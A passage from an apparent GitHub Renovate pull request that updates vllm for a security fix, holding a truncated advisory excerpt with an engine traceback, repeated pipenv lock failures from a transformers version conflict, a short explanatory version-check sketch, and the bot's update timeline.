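For the schema from the PoC, `problems` contains a single entry pointing at `$.properties.reason.type`, which is enough to reject the request before any grammar compilation is attempted.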

example traceback

ERROR 03-26 17:25:01 [core.py:340] EngineCore hit an exception: Traceback (most recent call last):
ERROR 03-26 17:25:01 [core.py:340]   File "/home/derekh/workarea/vllm/vllm/v1/engine/core.py", line 333, in run_engine_core
ERROR 03-26 17:25:01 [core.py:340]     engine_core.run_busy_loop()
ERROR 03-26 17:25:01 [core.py:340]   File "/home/derekh/workarea/vllm/vllm/v1/engine/core.py", line 367, in run_busy_loop
ERROR 03-26 17:25:01 [core.py:340]     outputs = step_fn()
ERROR 03-26 17:25:01 [core.py:340]               ^^^^^^^^^
ERROR 03-26 17:25:01 [core.py:340]   File "/home/derekh/workarea/vllm/vllm/v1/engine/core.py", line 181, in step
ERROR 03-26 17:25:01 [core.py:340]     scheduler_output = self.scheduler.schedule()
ERROR 03-26 17:25:01 [core.py:340]                        ^^^^^^^^^^^^^^^^^^^^^^^^^
ERROR 03-26 17:25:01 [core.py:340]   File "/home/derekh/workarea/vllm/vllm/v1/core/scheduler.py", line 257, in schedule
ERROR 03-26 17:25:01 [core.py:340]     if structured_output_req and structured_output_req.grammar:
ERROR 03-26 17:25:01 [core.py:340]                                  ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
ERROR 03-26 17:25:01 [core.py:340]   File "/home/derekh/workarea/vllm/vllm/v1/structured_output/request.py", line 

> ✂ **Note**
> 
> PR body was truncated to here.

@renovate

renovate Bot commented May 31, 2025

Contributor Author

⚠️ Artifact update problem

Renovate failed to update artifacts related to this branch. You probably do not want to merge this PR as-is.

♻ Renovate will retry this branch, including artifacts, only when one of the following happens:

  • any of the package files in this branch needs updating, or
  • the branch becomes conflicted, or
  • you click the rebase/retry checkbox if found above, or
  • you rename this PR's title to start with "rebase!" to trigger it manually

The artifact failure details are included below:

File name: model-servers/vllm/0.11.0/Pipfile.lock
Command failed: pipenv lock
Locking  dependencies...
CRITICAL:pipenv.patched.pip._internal.resolution.resolvelib.factory:Cannot 
install -r /tmp/pipenv-3x79djt8-requirements/pipenv-3ry_9qr3-constraints.txt 
(line 25) and transformers~=4.55.2 because these package versions have 
conflicting dependencies.
CRITICAL:pipenv.patched.pip._internal.resolution.resolvelib.factory:
The conflict is caused by:
    The user requested transformers~=4.55.2
    vllm 0.20.0 depends on transformers!=5.0.*, !=5.1.*, !=5.2.*, !=5.3.*, 
!=5.4.*, !=5.5.0 and >=4.56.0
Additionally, some packages in these conflicts have no matching distributions 
available for your environment:
    transformers
To fix this you could try to:
1. loosen the range of package versions you've specified
2. remove package versions to allow pip to attempt to solve the dependency 
conflict
Your dependencies could not be resolved. You likely have a mismatch in your 
sub-dependencies.
You can use $ pipenv run pip install <requirement_name> to bypass this 
mechanism, then run $ pipenv graph to inspect the versions actually installed in
the virtualenv.
Hint: try $ pipenv lock --pre if it is a pre-release dependency.
Hint: try $ pipenv lock --verbose to see the full dependency resolution output.
ERROR: ResolutionImpossible: for help visit https://pip.pypa.io/en/latest/topics/dependency-resolution/#dealing-with-dependency-conflicts
The conflict is caused by:
    The user requested transformers~=4.55.2
    vllm 0.20.0 depends on transformers!=5.0.*, !=5.1.*, !=5.2.*, !=5.3.*, 
!=5.4.*, !=5.5.0 and >=4.56.0

Hint: Re-run with --verbose to see the full dependency resolution output and 
identify which packages are in conflict.
Traceback (most recent call last):
  File "/opt/containerbase/tools/pipenv/2026.6.1/3.11.15/lib/python3.11/site-packages/pipenv/routines/lock.py", line 94, in do_lock
    venv_resolve_deps(
  File "/opt/containerbase/tools/pipenv/2026.6.1/3.11.15/lib/python3.11/site-packages/pipenv/utils/resolver.py", line 1449, in venv_resolve_deps
    c = resolve(cmd, st, project=project)
        ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "/opt/containerbase/tools/pipenv/2026.6.1/3.11.15/lib/python3.11/site-packages/pipenv/utils/resolver.py", line 1233, in resolve
    raise ResolutionFailure("Failed to lock Pipfile.lock!")
pipenv.exceptions.ResolutionFailure: ERROR: Failed to lock Pipfile.lock!


File name: model-servers/vllm/0.6.4/Pipfile.lock
Command failed: pipenv lock
Locking  dependencies...
CRITICAL:pipenv.patched.pip._internal.resolution.resolvelib.factory:Cannot 
install -r /tmp/pipenv-f8d1xsvp-requirements/pipenv-2mwihes6-constraints.txt 
(line 29) and transformers~=4.40.2 because these package versions have 
conflicting dependencies.
CRITICAL:pipenv.patched.pip._internal.resolution.resolvelib.factory:
The conflict is caused by:
    The user requested transformers~=4.40.2
    vllm 0.20.0 depends on transformers!=5.0.*, !=5.1.*, !=5.2.*, !=5.3.*, 
!=5.4.*, !=5.5.0 and >=4.56.0
Additionally, some packages in these conflicts have no matching distributions 
available for your environment:
    transformers
To fix this you could try to:
1. loosen the range of package versions you've specified
2. remove package versions to allow pip to attempt to solve the dependency 
conflict
Your dependencies could not be resolved. You likely have a mismatch in your 
sub-dependencies.
You can use $ pipenv run pip install <requirement_name> to bypass this 
mechanism, then run $ pipenv graph to inspect the versions actually installed in
the virtualenv.
Hint: try $ pipenv lock --pre if it is a pre-release dependency.
Hint: try $ pipenv lock --verbose to see the full dependency resolution output.
ERROR: ResolutionImpossible: for help visit https://pip.pypa.io/en/latest/topics/dependency-resolution/#dealing-with-dependency-conflicts
The conflict is caused by:
    The user requested transformers~=4.40.2
    vllm 0.20.0 depends on transformers!=5.0.*, !=5.1.*, !=5.2.*, !=5.3.*, 
!=5.4.*, !=5.5.0 and >=4.56.0

Hint: Re-run with --verbose to see the full dependency resolution output and 
identify which packages are in conflict.
Traceback (most recent call last):
  File "/opt/containerbase/tools/pipenv/2026.6.1/3.11.15/lib/python3.11/site-packages/pipenv/routines/lock.py", line 94, in do_lock
    venv_resolve_deps(
  File "/opt/containerbase/tools/pipenv/2026.6.1/3.11.15/lib/python3.11/site-packages/pipenv/utils/resolver.py", line 1449, in venv_resolve_deps
    c = resolve(cmd, st, project=project)
        ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "/opt/containerbase/tools/pipenv/2026.6.1/3.11.15/lib/python3.11/site-packages/pipenv/utils/resolver.py", line 1233, in resolve
    raise ResolutionFailure("Failed to lock Pipfile.lock!")
pipenv.exceptions.ResolutionFailure: ERROR: Failed to lock Pipfile.lock!


File name: model-servers/vllm/0.6.6/Pipfile.lock
Command failed: pipenv lock
Locking  dependencies...
CRITICAL:pipenv.patched.pip._internal.resolution.resolvelib.factory:Cannot 
install -r /tmp/pipenv-ytcmq9dj-requirements/pipenv-fvbu3k84-constraints.txt 
(line 30) and transformers~=4.40.2 because these package versions have 
conflicting dependencies.
CRITICAL:pipenv.patched.pip._internal.resolution.resolvelib.factory:
The conflict is caused by:
    The user requested transformers~=4.40.2
    vllm 0.20.0 depends on transformers!=5.0.*, !=5.1.*, !=5.2.*, !=5.3.*, 
!=5.4.*, !=5.5.0 and >=4.56.0
Additionally, some packages in these conflicts have no matching distributions 
available for your environment:
    transformers
To fix this you could try to:
1. loosen the range of package versions you've specified
2. remove package versions to allow pip to attempt to solve the dependency 
conflict
Your dependencies could not be resolved. You likely have a mismatch in your 
sub-dependencies.
You can use $ pipenv run pip install <requirement_name> to bypass this 
mechanism, then run $ pipenv graph to inspect the versions actually installed in
the virtualenv.
Hint: try $ pipenv lock --pre if it is a pre-release dependency.
Hint: try $ pipenv lock --verbose to see the full dependency resolution output.
ERROR: ResolutionImpossible: for help visit https://pip.pypa.io/en/latest/topics/dependency-resolution/#dealing-with-dependency-conflicts
The conflict is caused by:
    The user requested transformers~=4.40.2
    vllm 0.20.0 depends on transformers!=5.0.*, !=5.1.*, !=5.2.*, !=5.3.*, 
!=5.4.*, !=5.5.0 and >=4.56.0

Hint: Re-run with --verbose to see the full dependency resolution output and 
identify which packages are in conflict.
Traceback (most recent call last):
  File "/opt/containerbase/tools/pipenv/2026.6.1/3.11.15/lib/python3.11/site-packages/pipenv/routines/lock.py", line 94, in do_lock
    venv_resolve_deps(
  File "/opt/containerbase/tools/pipenv/2026.6.1/3.11.15/lib/python3.11/site-packages/pipenv/utils/resolver.py", line 1449, in venv_resolve_deps
    c = resolve(cmd, st, project=project)
        ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "/opt/containerbase/tools/pipenv/2026.6.1/3.11.15/lib/python3.11/site-packages/pipenv/utils/resolver.py", line 1233, in resolve
    raise ResolutionFailure("Failed to lock Pipfile.lock!")
pipenv.exceptions.ResolutionFailure: ERROR: Failed to lock Pipfile.lock!


File name: model-servers/vllm/0.8.4/Pipfile.lock
Command failed: pipenv lock
Locking  dependencies...
CRITICAL:pipenv.patched.pip._internal.resolution.resolvelib.factory:Cannot 
install -r /tmp/pipenv-ceru2uo2-requirements/pipenv-setjjfaa-constraints.txt 
(line 15) and transformers~=4.40.2 because these package versions have 
conflicting dependencies.
CRITICAL:pipenv.patched.pip._internal.resolution.resolvelib.factory:
The conflict is caused by:
    The user requested transformers~=4.40.2
    vllm 0.20.0 depends on transformers!=5.0.*, !=5.1.*, !=5.2.*, !=5.3.*, 
!=5.4.*, !=5.5.0 and >=4.56.0
Additionally, some packages in these conflicts have no matching distributions 
available for your environment:
    transformers
To fix this you could try to:
1. loosen the range of package versions you've specified
2. remove package versions to allow pip to attempt to solve the dependency 
conflict
Your dependencies could not be resolved. You likely have a mismatch in your 
sub-dependencies.
You can use $ pipenv run pip install <requirement_name> to bypass this 
mechanism, then run $ pipenv graph to inspect the versions actually installed in
the virtualenv.
Hint: try $ pipenv lock --pre if it is a pre-release dependency.
Hint: try $ pipenv lock --verbose to see the full dependency resolution output.
ERROR: ResolutionImpossible: for help visit https://pip.pypa.io/en/latest/topics/dependency-resolution/#dealing-with-dependency-conflicts
The conflict is caused by:
    The user requested transformers~=4.40.2
    vllm 0.20.0 depends on transformers!=5.0.*, !=5.1.*, !=5.2.*, !=5.3.*, 
!=5.4.*, !=5.5.0 and >=4.56.0

Hint: Re-run with --verbose to see the full dependency resolution output and 
identify which packages are in conflict.
Traceback (most recent call last):
  File "/opt/containerbase/tools/pipenv/2026.6.1/3.11.15/lib/python3.11/site-packages/pipenv/routines/lock.py", line 94, in do_lock
    venv_resolve_deps(
  File "/opt/containerbase/tools/pipenv/2026.6.1/3.11.15/lib/python3.11/site-packages/pipenv/utils/resolver.py", line 1449, in venv_resolve_deps
    c = resolve(cmd, st, project=project)
        ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "/opt/containerbase/tools/pipenv/2026.6.1/3.11.15/lib/python3.11/site-packages/pipenv/utils/resolver.py", line 1233, in resolve
    raise ResolutionFailure("Failed to lock Pipfile.lock!")
pipenv.exceptions.ResolutionFailure: ERROR: Failed to lock Pipfile.lock!
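
All four lock failures above have the same shape: the Pipfile pins transformers with a compatible-release specifier (`~=4.55.2` or `~=4.40.2`), while vllm 0.20.0 requires `transformers>=4.56.0`. The sketch below illustrates why no version can satisfy both for the 0.11.0 case. It assumes plain three-component numeric versions and ignores the `!=5.x` exclusions, so it is a simplified reading of the PEP 440 rules rather than what pip's resolver actually runs. The helper names and the candidate list are hypothetical and chosen only for illustration.

```python
def parse(version):
    """Split a plain dotted release such as "4.55.2" into a tuple of ints."""
    return tuple(int(part) for part in version.split("."))


def satisfies_compatible_release(candidate, pinned):
    """PEP 440 "~=": at least `pinned`, with all but the last component held fixed."""
    cand, pin = parse(candidate), parse(pinned)
    return cand >= pin and cand[: len(pin) - 1] == pin[:-1]


def satisfies_minimum(candidate, minimum):
    """PEP 440 ">=" for plain numeric releases of equal length."""
    return parse(candidate) >= parse(minimum)


# Illustrative candidates only, not a list of published transformers releases.
candidates = ["4.55.2", "4.55.4", "4.56.0", "4.57.1"]

# Versions accepted by both the Pipfile pin and the vllm 0.20.0 lower bound.
overlap = [
    version
    for version in candidates
    if satisfies_compatible_release(version, "4.55.2")
    and satisfies_minimum(version, "4.56.0")
]
print(overlap)
```

Because `~=4.55.2` admits only 4.55.x releases and the lower bound starts at 4.56.0, the overlap is empty regardless of which candidates are tried. This matches the log's first suggestion, loosening the pinned transformers range.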


@renovate renovate Bot force-pushed the renovate/pypi-vllm-vulnerability branch from 4781d93 to a70fcd1 Compare August 11, 2025 07:27
@renovate renovate Bot requested a review from a team as a code owner August 11, 2025 07:27
@renovate renovate Bot force-pushed the renovate/pypi-vllm-vulnerability branch from a70fcd1 to 27c0fb1 Compare August 21, 2025 16:42
@renovate renovate Bot changed the title Update dependency vllm to v0.9.0 [SECURITY] Update dependency vllm to v0.10.1.1 [SECURITY] Aug 21, 2025
@renovate renovate Bot force-pushed the renovate/pypi-vllm-vulnerability branch from 27c0fb1 to bcb2a4f Compare September 25, 2025 21:28
@renovate renovate Bot force-pushed the renovate/pypi-vllm-vulnerability branch from bcb2a4f to fb53a3d Compare October 7, 2025 18:12
@renovate renovate Bot changed the title Update dependency vllm to v0.10.1.1 [SECURITY] Update dependency vllm to v0.11.0 [SECURITY] Oct 7, 2025
@renovate renovate Bot force-pushed the renovate/pypi-vllm-vulnerability branch from fb53a3d to fa25622 Compare October 22, 2025 01:10
@renovate renovate Bot force-pushed the renovate/pypi-vllm-vulnerability branch from fa25622 to 5b769e6 Compare November 21, 2025 06:43
@renovate renovate Bot changed the title Update dependency vllm to v0.11.0 [SECURITY] Update dependency vllm to v0.11.1 [SECURITY] Nov 22, 2025
@renovate renovate Bot force-pushed the renovate/pypi-vllm-vulnerability branch from 5b769e6 to ac59da5 Compare January 9, 2026 09:41
@renovate renovate Bot changed the title Update dependency vllm to v0.11.1 [SECURITY] Update dependency vllm [SECURITY] Jan 9, 2026
@renovate renovate Bot force-pushed the renovate/pypi-vllm-vulnerability branch from ac59da5 to 4081aeb Compare January 14, 2026 09:06
@renovate renovate Bot force-pushed the renovate/pypi-vllm-vulnerability branch from 4081aeb to ebfedd4 Compare January 21, 2026 18:39
@renovate renovate Bot force-pushed the renovate/pypi-vllm-vulnerability branch from ebfedd4 to f2453df Compare January 28, 2026 18:52
@renovate renovate Bot changed the title Update dependency vllm [SECURITY] Update dependency vllm to v0.14.1 [SECURITY] Jan 28, 2026
@renovate renovate Bot force-pushed the renovate/pypi-vllm-vulnerability branch from f2453df to 72daf4b Compare March 31, 2026 17:14
@renovate renovate Bot changed the title Update dependency vllm to v0.14.1 [SECURITY] Update dependency vllm [SECURITY] Mar 31, 2026
@renovate renovate Bot force-pushed the renovate/pypi-vllm-vulnerability branch from 72daf4b to 1bd2543 Compare April 15, 2026 12:40
@renovate renovate Bot changed the title Update dependency vllm [SECURITY] Update dependency vllm to v0.19.0 [SECURITY] Apr 15, 2026
@renovate renovate Bot force-pushed the renovate/pypi-vllm-vulnerability branch from 1bd2543 to 08ea896 Compare May 6, 2026 02:59
@renovate renovate Bot changed the title Update dependency vllm to v0.19.0 [SECURITY] Update dependency vllm to v0.20.0 [SECURITY] May 7, 2026
Signed-off-by: renovate[bot] <29139614+renovate[bot]@users.noreply.github.com>
@renovate renovate Bot force-pushed the renovate/pypi-vllm-vulnerability branch from 08ea896 to 61076f5 Compare June 13, 2026 00:20
@renovate renovate Bot changed the title Update dependency vllm to v0.20.0 [SECURITY] Update dependency vllm to v0.22.0 [SECURITY] Jun 14, 2026
@renovate renovate Bot changed the title Update dependency vllm to v0.22.0 [SECURITY] Update dependency vllm to v0.22.0 [SECURITY] - autoclosed Jun 17, 2026
@renovate renovate Bot closed this Jun 17, 2026
@renovate renovate Bot deleted the renovate/pypi-vllm-vulnerability branch June 17, 2026 19:00